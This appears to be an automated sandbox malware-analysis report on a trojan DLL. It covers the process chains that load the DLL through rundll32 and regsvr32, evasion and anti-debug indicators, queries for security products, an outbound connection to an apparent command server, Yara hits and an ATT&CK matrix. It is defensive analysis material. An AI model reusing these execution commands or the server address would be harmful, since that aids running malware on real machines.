                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800176B86_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CAD06_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AD06_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008AD86_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800296EC6_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A6EC6_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800193006_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BB046_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002870C6_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000131C6_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000671C6_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029B286_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012F286_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BB286_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EB306_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800203346_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800107586_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800293686_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207686_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800173786_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800137806_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800153886_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000338C6_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: 1V4gPPcQvB.dllVirustotal: Detection: 39%
                      Source: 1V4gPPcQvB.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1V4gPPcQvB.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvcDyJjJQ\NcAvRfvDRbwLFn.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1V4gPPcQvB.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvcDyJjJQ\NcAvRfvDRbwLFn.dll"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@28/6@0/2
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,6_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3820:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 1V4gPPcQvB.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: 1V4gPPcQvB.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.648362301.00000000004B5000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.648362301.00000000004B5000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE2317BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFFE2317BE8
                      Source: 1V4gPPcQvB.dllStatic PE information: real checksum: 0x85ab6 should be: 0x872c4
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\1V4gPPcQvB.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\TvcDyJjJQ\NcAvRfvDRbwLFn.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\TvcDyJjJQ\NcAvRfvDRbwLFn.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\XfePrOUYXgeoZAs\CtbDsfecx.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\FLYyrZrfLeBKjbxn\mxVm.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6356Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6436Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6272Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-9997
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-9998
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000012.00000002.605035022.000001D2BDC65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: regsvr32.exe, 00000006.00000003.323905969.000000000062F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.648803355.000000000062F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.534715974.000001F508C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                      Source: regsvr32.exe, 00000006.00000003.324070812.0000000000641000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.323919837.000000000063F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.324089080.0000000000644000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.649002102.0000000000644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.604609331.000001D2B8229000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.605022460.000001D2BDC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.534811285.000001F508CED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.534802490.000001F508CE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000A.00000002.648559713.000001CCF8402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000000A.00000002.648615580.000001CCF8428000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.649094477.000002577346A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.648947309.0000023682E29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE23120E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFE23120E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE2317BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFFE2317BE8
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFFE231D318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE23120E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFE23120E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE2316550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFE2316550

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFFE231C6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFFE231C2B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FFFE231DF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFFE231C39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFFE231DF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFFE231DF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFFE231C7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFFE231C834
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FFFE231C450
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFFE231C8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FFFE231C16C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FFFE231C934
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFFE231E1E8
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE2314558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FFFE2314558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFE231E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFFE231E6C0

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000F.00000002.648636147.0000021C33640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000F.00000002.648737472.0000021C33702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.20701410000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.22e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.22e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.20701410000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.23396dc0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.23396dc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.649155251.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.265168643.0000023396DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.264939318.0000020701410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.266871028.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      21
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Query Registry
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                      Virtualization/Sandbox Evasion
                      Security Account Manager51
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS3
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets2
                      Process Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information
                      Cached Domain Credentials1
